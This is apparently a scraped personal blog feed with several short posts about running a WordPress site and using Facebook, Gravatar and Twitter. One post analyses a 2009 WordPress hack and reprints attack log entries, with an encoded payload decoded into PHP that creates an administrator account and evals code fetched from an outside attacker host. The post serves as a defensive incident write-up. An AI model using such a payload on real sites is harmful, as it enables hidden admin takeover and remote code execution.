I would like to imagine that this number represents some count of real people visiting, but the reality is less pleasant.  I’d guesstimate that about 99% of the visits to my site [...]]]>

I looked at the banner of my site today and see that Kelly’s World has broken the 1 million hits mark.  Whoopee, and so forth.

I would like to imagine that this number represents some count of real people visiting, but the reality is less pleasant.  I’d guesstimate that about 99% of the visits to my site are some combination of spambots and web crawling robots.  For those of you reading this who can comprehend what I’m saying: thanks for being a real human being taking an interest in something I have to say.

I appreciate the time you spend here, and hope you visit again often.  As for the spambots, scripts, and webcrawlers: 0110101101101001011100110111001100100000011011010111100100100000011000010111001101110011

I’m performing one of my periodic [...]]]>

UPDATE: I’ve completed the WordPress upgrades, including an update to the site theme and correction of a problem with my “Archives” page. I’m expecting to find some problems over the course of the next day or two but, for now at least, it appears that the basics are all working

I’m performing one of my periodic “oh my goodness, my WordPress site code is out of date!” updates today. While I do this, the site may be variously offline, funny-looking, or basically borked. Please accept my apologies and feel free to partake of one of the several billion other websites on the Internet during this disruption. Thanks!

Nothing [...]]]>

I’ve been using Facebook (or “Bookface”, as my nephew Shane calls it) fairly regularly lately. Today I decided to see what could be done to integrate my blog and Facebook a bit. I read the “how to” guide by Thiemo Fetzer, and now I have Yet Another WordPress Widget in the left nav of my site.

Nothing has changed for “normal” users of my site. For folks who regularly use Facebook, however, you now have an option. You can click on the “Login using Facebook” option, and your authentication will be handled via Facebook (i.e.: you log in using your Facebook credentials). KellysWorldBlog will be added to your application list once you’ve logged in once. Assuming I understand the application correctly, you won’t automatically receive anything from my site simply by using your Facebook login. I (or any visitor) can, however, click the “facebook share” icon to share individual blog posts on my wall.

What benefits does this give? Well, I guess you don’t need to remember your ID on my blog any more, and your Facebook icon will now appear next to the comments you post. But the main thing this does is allow for easy sharing of my blog posts with your friends.

In theory, this simplified “sharing” might get some new visitors to my blog- I’m not holding my breath about that, however. I’m inclined to believe that my blog has a rather specialized audience- I don’t do anything in particular to make my posts widely consumable, and most of it is only of interest to a handful of people who are friends and family, or who’s interests occasionally intersect some of mine.

Configuring the plugin is a bit odd, however: to make this work, I had to become a Facebook developer and create an application. Not much of an application, mind you: basically just a link for Facebook to work through for sharing data.

I guess the other main reason for doing this is that, like a lot of stuff I do, it satisfies my geek curiosity. I wanted to see how it would work, and once installed I wondered if anyone would actually use it. And it is sufficiently complicated that it activated a few parts of my brain that were dozing on an Easter weekend Saturday…

I was doing some work on my server today and noticed some errors in my logs of the following form:

Feb 23 16:04:45 kgadams httpd: PHP Fatal error: Call to undefined function bodyclasses() in /xxx/wpg2header.php on line 848

The problem appears to relate to an upgrade I performed several months ago in the Atahualpa WordPress theme I use. [...]]]>

I was doing some work on my server today and noticed some errors in my logs of the following form:

Feb 23 16:04:45 kgadams httpd: PHP Fatal error: Call to undefined function bodyclasses() in /xxx/wpg2header.php on line 848

The problem appears to relate to an upgrade I performed several months ago in the Atahualpa WordPress theme I use. The result was that any attempt to open a gallery page (i.e.: to look at my photos while visiting my blog) would result in a blank page… and the above error appearing in my server logs.

I’ve corrected the problem, but am disappointed that I didn’t even notice an issue that has probably existed since at least January. Ah well, ignorance is bliss I guess…

If you are running a WordPress based blog like I am and suddenly notice your post URLs have something “extra” appended (see the subject line), your blog has been hacked.

You can read more about it here (thanks, UCLABoyz, thanks schang!), where you will also find guidance regarding cleaning the problem up. Unfortunately, it appears that the [...]]]>

If you are running a WordPress based blog like I am and suddenly notice your post URLs have something “extra” appended (see the subject line), your blog has been hacked.

You can read more about it here (thanks, UCLABoyz, thanks schang!), where you will also find guidance regarding cleaning the problem up. Unfortunately, it appears that the hack works on all versions of WordPress up to and including the most recent.

I have BadBehavior installed on my blog, and so it was rejecting the URLs with this addition which I *think* would be thwarting the hackers involved: they hadn’t been able to create an administrative user. Unfortunately, it also meant none of my blog posts were working properly until I noticed the problem and corrected it.

Hopefully WordPress will issue a fix for this soon- in the mean time, keep an eye on your URLs, WordPress bloggers!

UPDATE: Another link to a lengthy thread regarding this hack on the WordPress.org site. What is interesting here is the apparent vector: a weakness in the WordPress code, apparently up to and including the most recent release, that permits an ordinary subscriber (i.e.: not an administrative user) to run some administrator features e.g.: changing the permalinks.

UPDATE #2: it appears that updating to the most recent version of WordPress (2.8.4) removes the “double slash” vector for running some admin commands (notably permalink.php). This fix was apparently added somewhere between WordPress version 2.8 and 2.8.4.

I’ve included some extracts from my server logs and further thoughts below…

Here are the “smoking gun” entries from my log files:

189.54.17.207 – - [03/Sep/2009:19:16:45 -0700] “GET /wp-login.php HTTP/1.1″ 200 907 “http://www.kgadams.net/” “Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.11) Gecko/20071127″

189.54.17.207 – - [03/Sep/2009:19:16:47 -0700] “POST /wp-login.php HTTP/1.1″ 302 20 “http://www.kgadams.net/wp-login.php” “Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.11) Gecko/20071127″

189.54.17.207 – - [03/Sep/2009:19:16:50 -0700] “GET /wp-admin/ HTTP/1.1″ 200 8117 “http://www.kgadams.net/wp-login.php” “Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.11) Gecko/20071127″

189.54.17.207 – - [03/Sep/2009:19:16:52 -0700] “GET /wp-admin//options-permalink.php HTTP/1.1″ 200 4145 “http://www.kgadams.net/wp-admin//options-permalink.php” “Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.11) Gecko/20071127″

189.54.17.207 – - [03/Sep/2009:19:16:55 -0700] “POST /wp-admin//options-permalink.php HTTP/1.1″ 200 4230 “http://www.kgadams.net/wp-admin//options-permalink.php” “Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.11) Gecko/20071127″

189.54.17.207 – - [03/Sep/2009:19:16:57 -0700] “POST /xmlrpc.php HTTP/1.1″ 403 521 “JHJvbGU9J2FkbWluaXN0cmF0b3InOyR1c2VyX2xvZ2luPSdMYXphcm9LaW1tb25zODUnOyR1c2VyX3Bhc3M9JzJtZXprYVRUZG1WcCc7ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2xpbmtzLndlYndvcmRwcmVzcy5jbi9kYXRhL3Nob3J0cGFydDIudHh0JykpO2V4aXQ7″ “Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.11) Gecko/20071127″

I don’t have details of what the user at IP address ’189.54.17.207′ (registered in Latin America) was doing with the first three actions calling wp-login.php, but I’m guessing creating a normal subscriber ID and logging in. Action #4 and #5 above, the call to /wp-admin//options-permalink.php (note the double “//”) is where the permalink was changed. The revised permalink includes an ‘eval’ statement- that executes (runs as a program) what follows, which is a base 64 decode of the referrer string.

The final step is an attempt to use xmlrpc.php to execute the encoded string. The encoded string, decoded, looks like this:

$role=’administrator’;$user_login=’LazaroKimmons85′;$user_pass=’2mezkaTTdmVp’;eval(file_get_contents(‘http://links.webwordpress.cn/data/shortpart2.txt’));exit;

What this is doing is setting a few PHP variables then executing the code retrieved from http://links.webwordpress.cn/data/shortpart2.txt. That little bit of code creates the administrative user and, from what I understand, hides it.

In the case of my site, the hacked permalink seems to have been blocked- I’m not sure whether by BadBehavior or something else I have installed. So the hack was half-successful: the permalink was installed, but using the permalink generated an error.

I installed a new WordPress theme several weeks ago. I noticed a couple of days ago that posts had funny looking “blank portrait” images beside them. I right clicked on them, and noticed that the images were linked to Gravatar. I remember reading about “Gravatars” (globally recognized avatars) quite some time ago, but I more or [...]]]>

I installed a new WordPress theme several weeks ago. I noticed a couple of days ago that posts had funny looking “blank portrait” images beside them. I right clicked on them, and noticed that the images were linked to Gravatar. I remember reading about “Gravatars” (globally recognized avatars) quite some time ago, but I more or less dismissed it as not relevant to my interests. I think when I read about it, there may have even been charges associated with the service

Well, apparently it is relevant to my interests now. Automattic (the company responsible for WordPress) has acquired the service, and now you can set yourself up there for free. If go to the Gravatar site or alternately have an account on WordPress.com, you can associate an image with your email address… or apparently several images with several different email addresses. Anyway, once you’ve done that, if you use that same email address to identify yourself on a blog or website that supports Gravatars, your image will appear there without further setup.

All of this was news to me, but apparently Gravatar support is actually “baked in” to WordPress since version 2.5, and any “compliant” WordPress theme inherits this support. I didn’t notice it earlier probably because I was using a non-standard theme. None of this probably means much to most of my visitors but… I found it intriguing to discover something I had completely missed. Sort of like discovering an old friend of yours has been hand carving collectable duck decoys for years and you never had a clue they did any such thing. Exactly like that… except completely different.

I [...]]]>

I’ve moved my Twitter feed from the right side to the left side navigation area on this page. The “balance” was starting to bug me (i.e.: too much vertical “stuff” on the right versus the left), and for some reason it just seems to make more sense under “recent comments” then above my photo gallery block.

I have not yet really slowed down my rate of “tweeting” yet: by the way, I prefer calling individual Twitter posts “twits”, but apparently that is bad form- sorry. I started on May 14th, and I’m posting somewhere around six to eight updates per day. if you look at my follow cost I seem to have stabilized at just below 400 milliscobles. I’m not feeling any compulsion to tweet: I just do so when something catches my eye and I think other folks might want to hear about it. Probably my main “vanity” when tweeting is that I respond to a few people like badastronomer (Phil Plait) and wilh (Wil Wheaton) on occasion. In part I do this because I’m hoping they might say something back- but generally I actually *do* have a question, I just probably would never have the courage to ask them to their face.   

I think that is the most intriguing thing for me about Twitter: the fact that you can have a sort of disjointed, quasi-real time conversation with someone whom you would normally never interact. I don’t necessarily mean someone “famous”, but that has its appeal. Twitter has a bit more immediacy than, say, a forum (bulletin board), and there is much more of a “conversation” going on than with a blog. I have only received a couple of responses to my queries to other Twitter users, but those were sufficient to feed my interest. In that way, I’d say it is somewhat like the thrill some people get from playing slot machines: the reward in this case is becoming part of a conversation, and what you are gambling is the exposure you risk by making some of your more immediate (and less well considered) thoughts public.

And it is okay that the conversation is often very one-sided. I’ll use the example of Wil Wheaton for illustration purposes. I learned long ago from Wil Wheaton’s website that he is a much more “real” person than I thought he might be based on his Wesley Crusher character from Star Trek TNG. But via his Tweets I’ve discovered that he plays D&D, enjoys an occasional beer, and roots for his favorite hockey team. These aren’t canned, crafted, by the script messages (although you find some of that on Twitter), and the spontaneity is sometimes quite… refreshing. The conversation feels more like what you might hear in a brief chat at a bar or party if you ran into these people. And I suppose that is the point: the enforced brevity of the message strips away the formality of the longer forms.

I guess what I’m saying is that I’m starting to “get” Twitter. I can certainly understand not wanting anything to do with it, or simply not seeing the point. But like a lot of things, now that I’ve tried it I find the reality is more intriguing than my speculation and critical analysis previously led me to conclude.

I have added a cat banner which will appear periodically at the top of this page, along with my various tree and flower images. Here is a teeny tiny version for your enjoyment:

A couple of notes about these “rotating” images